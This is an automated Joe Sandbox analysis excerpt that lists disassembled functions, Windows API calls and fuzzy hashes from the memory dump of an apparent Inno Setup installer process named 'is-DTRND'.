Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 6715253817c5446c6029b6eac7d795c38f3317e9480a1568d90ee15279b25660
Instruction ID: 25e08a3a2396fdb50ec6365b92d55a3c498184e9eaf3c6780c29ae4bfb0144ce
Opcode Fuzzy Hash: 6715253817c5446c6029b6eac7d795c38f3317e9480a1568d90ee15279b25660
Instruction Fuzzy Hash: FBE09BB0A046048BCB15CF39848131677D15F89361F08CA6AAC5CCB3D7E73C84055667

Uniqueness

Uniqueness Score: -1.00%

Function 00414744 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0048864A,?,0048866A,?,?,00000000,0048864A,?,?), ref: 00414763

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA4 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406FB8

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: f6c1aad4a8904306a7b9da86c6f5227892e9131e9cd6accf8a849aea266828c0
Instruction ID: 094b55ea42a2d669888ebe979cb1588c753d9803ef852f165be57089eabc71c4
Opcode Fuzzy Hash: f6c1aad4a8904306a7b9da86c6f5227892e9131e9cd6accf8a849aea266828c0
Instruction Fuzzy Hash: 18D05B723082107AE224955B6D84EAB5BDCCBC5770F11063EF568D71C1D6308C058775

Uniqueness

Uniqueness Score: -1.00%

Function 00423714 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 004236C0: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 004236D5

ShowWindow.USER32(00410718,00000009,?,00000000,0041EE6C,00423A02,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0042372F

Part of subcall function 004236F0: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 0042370C

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: InfoParametersSystem$ShowWindow
String ID:
API String ID: 3202724764-0
Opcode ID: 770afa24fe7550dadab928d38750dae13ac9c0c6fd680db7553044468440b3c9
Instruction ID: acb803ed99d8a779adfd935bf79fac66e91ef2ff7e35841efc32692bfe1f30af
Opcode Fuzzy Hash: 770afa24fe7550dadab928d38750dae13ac9c0c6fd680db7553044468440b3c9
Instruction Fuzzy Hash: AFD0A7923812702187307EBB3846A9B52BC4DD22E7388483FB550C7303ED9D8E0210BC

Uniqueness

Uniqueness Score: -1.00%

Function 0042438C Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(?,00000000), ref: 004243A4

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 5766a25384be28116e18b02812b6949491dca06ef70728af85351d8e04794ef0
Instruction ID: 37361632d4d514c50c0f5b3b94c48c5e4f37ef369a7246e00f52f19e18fb69a1
Opcode Fuzzy Hash: 5766a25384be28116e18b02812b6949491dca06ef70728af85351d8e04794ef0
Instruction Fuzzy Hash: 74D012A270013027C701BAA95484A8567CC4B8925671540ABF904D7296C6388A404358

Uniqueness

Uniqueness Score: -1.00%

Function 00460A8C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00461704,00000000,00000000,00000000,00400000,STOPIMAGE,0000000C,00000000), ref: 00460AA4

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00406F54 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

6CAD5CA0.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A98C,0040CF38,?,?,00000000), ref: 00406F71

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 433f440210a344e7a3304f08861641889f46d5e1c7f71bb4f49350f7bdef092c
Instruction ID: fbf433f388ee34c674fb7f0d47a908a919ece7d44da589a3048eb8b88fcd3b6d
Opcode Fuzzy Hash: 433f440210a344e7a3304f08861641889f46d5e1c7f71bb4f49350f7bdef092c
Instruction Fuzzy Hash: 16C048A138030032F92026B60C87F2600885704F19E64857AB784BE1C2C8E9A808011C

Uniqueness

Uniqueness Score: -1.00%

Function 004321C0 Relevance: 1.5, APIs: 1, Instructions: 13comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004321CC

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: df445557e7b044264c1bd33c4ff95ea1a8a72b63f89f17b380f8b90f7f5f6f80
Instruction ID: 9b37a0a06ce19e8ef19df0e59975e005822ebcec00dd204071a81c40df8ba161
Opcode Fuzzy Hash: df445557e7b044264c1bd33c4ff95ea1a8a72b63f89f17b380f8b90f7f5f6f80
Instruction Fuzzy Hash: 80D067B49062048AD340BF69A985B0C3BA0A74E74CFA0993FE508A62A1D77954499F1D

Uniqueness

Uniqueness Score: -1.00%

Function 00450104 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(?,00000000,0046730A), ref: 0045010B

Part of subcall function 0044FFFC: GetLastError.KERNEL32(0044FD08,0044FE2D,?,00000000,?,0048AA7A,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005,00000000,0048AC17), ref: 0044FFFF

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 7f2d6b46b854857be2457e499f427f7ef468b9c3465d519b02ef8c24fe06530d
Instruction ID: 8ba7de62c0f8f2b826c565226acfba955b7b40c9ce9c5bc33c07dfd11b4ca65a
Opcode Fuzzy Hash: 7f2d6b46b854857be2457e499f427f7ef468b9c3465d519b02ef8c24fe06530d
Instruction Fuzzy Hash: A2C09B6530061547DF00E6BEC9C1A0777EC5F593053104077F918CF217E769EC084729

Uniqueness

Uniqueness Score: -1.00%

Function 0040733C Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32(00000000,?,0048AA46,00000000,0048ABE3,?,?,00000005,00000000,0048AC17,?,?,00000000), ref: 00407347

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 2fbdcd1769973cdfba2b5d519fc1f3131b777102045368f03a3cadaf0bd6878e
Instruction ID: 896aec1077dce6a9c9566130b3b637ad8921e49b9395fb70f53529d07e155150
Opcode Fuzzy Hash: 2fbdcd1769973cdfba2b5d519fc1f3131b777102045368f03a3cadaf0bd6878e
Instruction Fuzzy Hash: F2B012F13A030A1ACE007AFE4CC191604DC464C3163401B7E7006E71C3DD3CE508001C

Uniqueness

Uniqueness Score: -1.00%

Function 0042E2AB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,0042E2C9), ref: 0042E2BC

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 0b6356324c10b9c5315b82fe1bd37e37c079b3f508247d09bf8e24882e174b41
Instruction ID: d44268c39032d66eb9059e67749796375290d63107054dc34eb47e6ccc5263f2
Opcode Fuzzy Hash: 0b6356324c10b9c5315b82fe1bd37e37c079b3f508247d09bf8e24882e174b41
Instruction Fuzzy Hash: 1EB09B7A70C6009DEB0997D7B41551973E8D7C47103F148B7F000D6580D57C6400463C

Uniqueness

Uniqueness Score: -1.00%

Function 004166B4 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

72E69840.USER32(?), ref: 004166BB

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: E69840
String ID:
API String ID: 4204705538-0
Opcode ID: da20a264590b8da76bcc673a24629bda81143ece4f0058ab807c22f450b41b4b
Instruction ID: e9a41f564f419c910e8f91a975f78234a4d9e50f6d6e429a21b41bd5f0bff929
Opcode Fuzzy Hash: da20a264590b8da76bcc673a24629bda81143ece4f0058ab807c22f450b41b4b
Instruction Fuzzy Hash: 46A002655016019ADE04B7B5888DF662298BB48208FCD05F971049B052C53C94008A18

Uniqueness

Uniqueness Score: -1.00%

Function 004487BC Relevance: 1.4, APIs: 1, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e35ca788a800f441d4abc29cdf2e714a1d2045ec6d2750f6368b2cacc4690ae
Instruction ID: 5d73c6f8daca525de1b34ad835d17be6b4db68b1b7569b0a0447b861dcc13144
Opcode Fuzzy Hash: 1e35ca788a800f441d4abc29cdf2e714a1d2045ec6d2750f6368b2cacc4690ae
Instruction Fuzzy Hash: 2A5183B0A005099FEB01EFA9C882AAFBBF5EF48314F50447AE500E7351DA789D45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401680 Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004016ED

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 623ec00aa2380b766de036dbdfdd6f0b09fa57e2f21e8112d72e2660bd701401
Instruction ID: 8e25b90ae9f864962d718719b52cc57e6420d8e0f8478eb6e4e12427a5fbc1b4
Opcode Fuzzy Hash: 623ec00aa2380b766de036dbdfdd6f0b09fa57e2f21e8112d72e2660bd701401
Instruction Fuzzy Hash: 76117CB2A057059FC3109F29CC80A2BB7E2EBC4765F15C93DE598AB3A5D635AC408789

Uniqueness

Uniqueness Score: -1.00%

Function 0041F48C Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EE6C,?,00423957,00423CD4,0041EE6C), ref: 0041F4AA

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 402590cf4b5d7f110bb94798805d05b5fec5b95a2efd47f6f4f18a6dc87802f2
Instruction ID: 42afb4f221658e7fb89e2175542a32d299b5515218ded37e71f0002ca044b13b
Opcode Fuzzy Hash: 402590cf4b5d7f110bb94798805d05b5fec5b95a2efd47f6f4f18a6dc87802f2
Instruction Fuzzy Hash: 28117C746403059FC710EF19D880B86F7E5EF98350F10C93AE9989B396D378E949CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401714 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,0040197B), ref: 0040176E

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: b87ec69a82047565488b436492ac0a5e2e4a3ca1825bad6867eb9f30230477ea
Instruction ID: 513dc5185c5ea873f64aca2166fc8996875178c568a1f6713369453d53051677
Opcode Fuzzy Hash: b87ec69a82047565488b436492ac0a5e2e4a3ca1825bad6867eb9f30230477ea
Instruction Fuzzy Hash: 9401F776A452144FC310AE28DCC0E2A77A5DB84724F15453DEE84A7391D33A6C0687A8

Uniqueness

Uniqueness Score: -1.00%

Function 00451A68 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00451AD1), ref: 00451AB3

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 9a2442602f04fca4c12d272be6812ac72593b6de9992ca1bcbe19b3311dd92df
Instruction ID: 6fba9e0342ff494ad0917aee243d04831ce01c0435d3168b0008c0cc2e51abc3
Opcode Fuzzy Hash: 9a2442602f04fca4c12d272be6812ac72593b6de9992ca1bcbe19b3311dd92df
Instruction Fuzzy Hash: 5D014C356046046A8B01DF6A98405EEF7E8DB49320B2082B7FC14D3762D6344D059664

Uniqueness

Uniqueness Score: -1.00%

Function 0045A724 Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,0045A861), ref: 0045A740

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: e5a1d81624fd0ea0ca6df7bb48e7ecff761dbb388dc9058928e02473b5d13605
Instruction ID: b68ac2cbadfdda480c967e6d055cfdd63c693a43d000438897aaa66405a27238
Opcode Fuzzy Hash: e5a1d81624fd0ea0ca6df7bb48e7ecff761dbb388dc9058928e02473b5d13605
Instruction Fuzzy Hash: 60D092B17107005FEB94CF7A8CC5B0326E8BB08601B2185BAA908DB286E678D4208B58

Uniqueness

Uniqueness Score: -1.00%

Function 00406FDC Relevance: 1.3, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00406FDD

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ada167b39e06168283aa1de58693712353b2e1493b74d73bd649c322d38fd937
Instruction ID: f91bbd6786645de71ad529a75f1249e0221a6909fe05d9e6353a8ece16ee0238
Opcode Fuzzy Hash: ada167b39e06168283aa1de58693712353b2e1493b74d73bd649c322d38fd937
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00455E7C Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 184pipetimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94

GetTickCount.KERNEL32 ref: 00455EE6
QueryPerformanceCounter.KERNEL32(00000000,00000000,0045617B,?,?,00000000,00000000,?,0045670E,?,00000000,00000000), ref: 00455EEE
GetSystemTimeAsFileTime.KERNEL32(00000000,00000000), ref: 00455EF8
GetCurrentProcessId.KERNEL32(?,00000000,00000000,0045617B,?,?,00000000,00000000,?,0045670E,?,00000000,00000000), ref: 00455F01
CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00455F76
GetLastError.KERNEL32(00000000,00080003,00000006,00000001,00002000,00002000,00000000,00000000,?,00000000,00000000), ref: 00455F84
6CAD5CA0.KERNEL32(00000000,C0000000,00000000,0048CA50,00000003,00000000,00000000,00000000,00456137), ref: 00455FCC
SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00456126,?,00000000,C0000000,00000000,0048CA50,00000003,00000000,00000000,00000000,00456137), ref: 00456005

Part of subcall function 0042D80C: GetSystemDirectoryA.KERNEL32 ref: 0042D81F

6CF47180.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004560AE
CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 004560E8
CloseHandle.KERNEL32(000000FF,0045612D,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00456120

Part of subcall function 00451E44: GetLastError.KERNEL32(00000000,00451EDC,?,?,00000000,00000000,00000005,00000000,00452922,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451E68

Strings

SetNamedPipeHandleState, xrefs: 0045600E
Cannot utilize 64-bit features on this version of Windows, xrefs: 00455EC7
